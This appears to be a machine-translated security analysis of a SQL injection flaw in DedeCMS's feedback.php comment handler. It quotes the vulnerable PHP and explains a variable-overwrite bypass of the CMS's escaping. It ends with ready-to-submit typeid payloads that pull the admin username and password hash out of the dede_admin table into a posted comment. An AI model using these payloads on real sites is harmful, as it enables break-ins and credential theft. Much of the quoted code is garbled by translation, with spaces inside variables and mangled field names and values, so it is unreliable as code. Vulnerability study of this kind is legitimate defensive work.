Analysis of recent dedecms Injection

Vulnerability file: plus \ feedback. php.

Problematic code:

...
If ($ comtype = 'comments ')
{
$ Arctitle = addslashes ($ title );
If ($ msg! = '')
{// $ The typeid variable is not initialized.
$ Inquery = "insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artle TLE', 'IP', 'ischeck', 'dtime ', 'Mid ', 'bad', 'good', 'ftype', 'face', 'msg ')
VALUES ('$ aid', '$ typeid',' $ username', '$ Artle TLE', '$ ip',' $ ischeck', '$ dtime ', '{$ pai_ml-> M_ID}', '0', '0', '$ feedbacktype', '$ face', '$ msg ');";
Echo $ inquery; // debug and output query statements
$ Rs = $ dsql-> ExecuteNoneQuery ($ inquery );
If (! $ Rs)
{
ShowMsg ('posting comments error! ','-1 ');
// Echo $ dsql-> GetError ();
Exit ();
}
}
}
// Reference and reply
Elseif ($ comtype = 'reply ')
{
$ Row = $ dsql-> GetOne ("SELECT * FROM 'dede _ feedback' WHERE id = '$ fid '");
$ Arctitle = $ row ['artle tle'];
$ Aid = $ row ['aid '];
$ Msg = $ quotemsg. $ msg;
$ Msg = HtmlReplace ($ msg, 2 );
$ Inquery = "insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artle TLE', 'IP', 'ischeck', 'dtime ', 'Mid ', 'bad', 'good', 'ftype', 'face', 'msg ')
VALUES ('$ aid', '$ typeid',' $ username', '$ Artle TLE', '$ ip',' $ ischeck', '$ dtime ', '{$ pai_ml-> M_ID}', '0', '0', '$ feedbacktype', '$ face', '$ msg ')";
$ Dsql-> ExecuteNoneQuery ($ inquery );
}

 

Complete input statement, the second parameter typeid is controllable.

Insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype', 'face', 'msg ') VALUES ('000000', '2', 'tourists', 'paxmac ', '2017. 0.0.1 ', '1', '000000', '0', '0', '0', 'feedback', '0', 'nsfocus & paxmac team ');

The common. inc. php file processes all requests.

 

function _RunMagicQuotes(&$svar){  if(!get_magic_quotes_gpc())  {  if( is_array($svar) )  {    foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);  }  else  {    if( strlen($svar)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )    {    exit('Request var not allow!');    }    $svar = addslashes($svar);  }  }  return $svar;}…..foreach(Array('_GET','_POST','_COOKIE') as $_request)  {  foreach($$_request as $_k => $_v)       {        if($_k == 'nvarname') ${$_k} = $_v;        else ${$_k} = _RunMagicQuotes($_v);      }  }….

From the code above, we can see that he has escaped external commits, but in the filter. ini. php file

 

Function _ FilterAll ($ fk, & $ svar) {global $ comment _notallowstr, $ comment _replacestr; if (is_array ($ svar )) {foreach ($ svar as $ _ k = >$ _ v) {$ svar [$ _ k] = _ FilterAll ($ fk, $ _ v );}} else {if ($ response _notallowstr! = ''& Preg_match (" # ". $ pai_notallowstr." # I ", $ svar) {ShowMsg (" $ fk has not allow words! ", '-1'); exit ();} if ($ pai_replacestr! = '') {$ Svar = preg_replace ('/'. $ pai_replacestr. '/I', "***", $ svar) ;}return $ svar;}/* pair _ GET, _ POST, _ COOKIE filtering */foreach (Array ('_ get',' _ Post', '_ COOKIE') as $ _ request) {foreach ($ _ request as $ _ k =>$ _ v) {$ _ k }=_ FilterAll ($ _ k, $ _ v );}}

The above is the code for processing sensitive words, but the variable is registered, resulting in a second variable Overwrite Vulnerability. In fact, this vulnerability exists a long time ago because only the key of the one-dimensional array is checked for the submitted variables and can be bypassed to create unsupported system configuration variables, all the modifications made by dedecms are confusing. All the repairs are superficial, and the causes of the vulnerability problems are not modified. From the patch, he added only one sentence to judge whether the $ typeid is a number. The anti-injection code of 80 sec was bypassed twice and ignored.
So when GPC is OFF, the escaped variables will be overwritten again and become normal code.
Eg: typeid = 2 \ 'Overwrite typeid = 2'
Those who have studied the last dedecms SQL Injection problem will surely understand its anti-injection mechanism. Here is a simple analysis. It is trustworthy and does not check content between \ and. Therefore, you only need to put the code you want to use in ''to escape the check. Using a Mysql syntax, the value @ ''' is empty. The following constructs the vulnerability exp:
Typeid = 100', @ ''', 0 × 11111,1111, 123 172.1660, 0, 0, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM dedede_admin )), (108, '100
I use tamper data to submit this parameter,

In fact, a small bug is also used here.

We can see that its table structure can only be null for msg, but null is used in username in the Code. This is an invalid statement and insertion alone will not succeed, however, the following statement is true. insert (a, B) values () (,) is invalid) when the conditions are met, two statements are successfully inserted at the same time. Due to the number of characters displayed, the msg field is selected as the output.
Supplement: 'aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid', 'bad ', 'Good', 'ftype', 'face', 'msg 'aid is the ID of the article, so it is unsuccessful to directly use my statement. You need to change it to your article ID.
Typeid = 100', @ ''', 0 × 11111,1111, 123 172.1660, 0, 0, (SELECT concat (uname, 0x5f, pwd, 0x5f) FROM 'dede _ admin'), (comment Article ID, '100

For example, if the message is submitted by Tamper (article id = 123), change msg to www.2cto.com

Mcbang & typeid = 0', '3', '4', '5', '0', '000000', % 20'0', '0 ', '0', '0', '0', 'aaaaa'), ('123', '2', @ ''', '4', '5 ', '1', '000000', % 20' 0', '0', '0', '0', '0', (SELECT concat (uname, 0x5f, pwd, 0x5f) from '@#__ admin'), (123, '2